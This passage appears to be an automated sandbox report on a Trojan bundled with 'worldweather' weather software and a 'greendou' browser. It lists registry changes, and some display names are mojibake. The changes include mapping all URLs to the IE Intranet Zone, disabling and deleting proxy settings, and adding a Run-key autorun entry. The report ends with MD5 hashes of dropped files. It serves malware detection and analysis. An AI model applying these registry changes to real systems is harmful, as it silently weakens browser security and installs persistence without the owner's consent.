[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Program Files%\worldweather\5.0.0.5002]
"worldWeatherUpdate.5002.exe" = "天æ°â€Â预报å‡级核心"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1C 00 00 00 01 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "BF 2A 97 12 A0 AE 25 AF 75 E8 94 21 60 E7 8F 4E"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process worldWeatherUpdate.5002.exe:2896 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1D 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "53 21 C5 C1 17 8D 54 C2 04 DE FB 24 47 6F 13 AE"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process 365weatherIns_61.exe:408 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\worldweather]
"UninstallString" = "%Program Files%\worldweather\5.0.0.5002\uninst.exe"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\worldweather.exe]
"index" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\365weatherIns_61.exe"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\worldweather.exe]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1B 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\worldweather.exe]
"jieguo" = "mac=00-0C-29-8A-8B-37&soft_id=33&tuiguang_id=C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\365weatherIns_61.exe&yanzheng=318d97cc71dd4de571edddf8241ae5c0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\worldweather]
"DisplayIcon" = "%Program Files%\worldweather\5.0.0.5002\worldweather.exe"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\worldweather.exe]
"mac" = "00-0C-29-8A-8B-37"
"(Default)" = "%Program Files%\worldweather\5.0.0.5002\worldweather.exe"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\worldweather.exe]
"collection" = "%Documents and Settings%\%current user%\Favorites"
"menu" = "%Documents and Settings%\%current user%\Start Menu"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\worldweather.exe]
"desk" = "%Documents and Settings%\%current user%\Desktop"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "6D B8 5F 28 37 98 B9 A7 C4 46 72 83 47 4B 1F F9"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\worldweather]
"URLInfoAbout" = "http://weather.22pk.cn/"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\worldweather]
"Publisher" = "´óÖÚÌìÆø¹¤Ãâ€â€ÃƒÆ’·ÃŠÃ’"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Program Files%\worldweather]
"5.0.0.5002/worldWeatherRealTime5002.exe" = "worldWeatherRealTime5002.exe"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Favorites" = "%Documents and Settings%\%current user%\Favorites"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\worldweather]
"DisplayVersion" = "5.0.0.5002"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\worldweather]
"DisplayName" = "´óÖÚÌìÆøÃâ€Â¤±¨ 5.0.0.5002"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"worldweather5002" = "%Program Files%\worldweather\5.0.0.5002\worldweather.exe /autorun"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process greendou.exe:772 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCR\CLSID\{0002DF01-0000-0000-C000-000000000046}\LocalServer32]
"(Default)" = "%Program Files%\Internet Explorer\IEXPLORE.EXE"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1A 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache]
"@shell32.dll,-12693" = "Favorites"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012014051320140514]
"CacheOptions" = "11"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012014051320140514]
"CachePath" = "%USERPROFILE%\Local Settings\History\History.IE5\MSHist012014051320140514\"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012014051320140514]
"CacheRepair" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"Name" = "greendou.exe"
[HKCU\Software\Microsoft\Internet Explorer\Main]
"Disable Script Debugger" = "yes"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012014051320140514]
"CacheLimit" = "8192"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"ID" = "1244086619"
[HKCU\Software\Gie]
"update2" = "2"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "24 BF 3D E6 6D 66 76 3F 2B C6 4D 0F 9F ED 49 E4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012014051320140514]
"CachePrefix" = ":2014051320140514:"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Favorites" = "%Documents and Settings%\%current user%\Favorites"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
"IntranetName" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan deletes the following registry key(s):
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012014031720140318]
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
[HKLM\System\CurrentControlSet\Services\Tcpip\Performance]
"Error Count"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
The process %original file name%.exe:204 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Â̶¹ä¯ÀÀÆ÷]
"Publisher" = "ico10"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Â̶¹ä¯ÀÀÆ÷]
"DisplayName" = "Â̶¹ä¯ÀÀÆ÷ 1.0.0.0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "6E 45 6C 84 01 24 A1 EF 38 59 8B 06 81 67 27 90"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Â̶¹ä¯ÀÀÆ÷]
"DisplayVersion" = "1.0.0.0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
The process worldWeatherRealTime5002.exe:2408 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C7 E5 65 15 80 2A F8 F7 B1 7A 66 3F C5 CD 04 09"
[HKCR\AppID\worldWeatherRTP.EXE]
"AppID" = "{C75ABB58-E428-4F54-A75E-39E1905088A4}"
[HKCR\AppID\{C75ABB58-E428-4F54-A75E-39E1905088A4}]
"LocalService" = "worldWeatherRealTime5002"
"(Default)" = "worldWeatherRTP"
The Trojan deletes the following value(s) in system registry:
[HKCR\AppID\{C75ABB58-E428-4F54-A75E-39E1905088A4}]
"LocalService"
Dropped PE files
| MD5 | File path |
|---|---|
| 1eca983679d2f2760f15fc79a6a294ca | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\365weatherIns_61.exe |
| 99f345cf51b6c3c317d20a81acb11012 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsr5.tmp\KillProcDLL.dll |
| e4ec95271ff1bcebab49bdfed6817a22 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsr5.tmp\SkinBtn.dll |
| 00a0194c20ee912257df53bfe258ee4a | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsr5.tmp\System.dll |
| 50fdadda3e993688401f6f1108fabdb4 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsr5.tmp\inetc.dll |
| a7d710e78711d5ab90e4792763241754 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsr5.tmp\md5dll.dll |
| ab73c0c2a23f913eabdc4cb24b75cbad | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsr5.tmp\nsDialogs.dll |
| 480f41c61ef59b1dbde50427b3d095b2 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsr5.tmp\nsWindows.dll |
| 50fdadda3e993688401f6f1108fabdb4 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsu2.tmp\Inetc.dll |
| a7d710e78711d5ab90e4792763241754 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsu2.tmp\Md5dll.dll |
| a5f8399a743ab7f9c88c645c35b1ebb5 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsu2.tmp\NSISdl.dll |
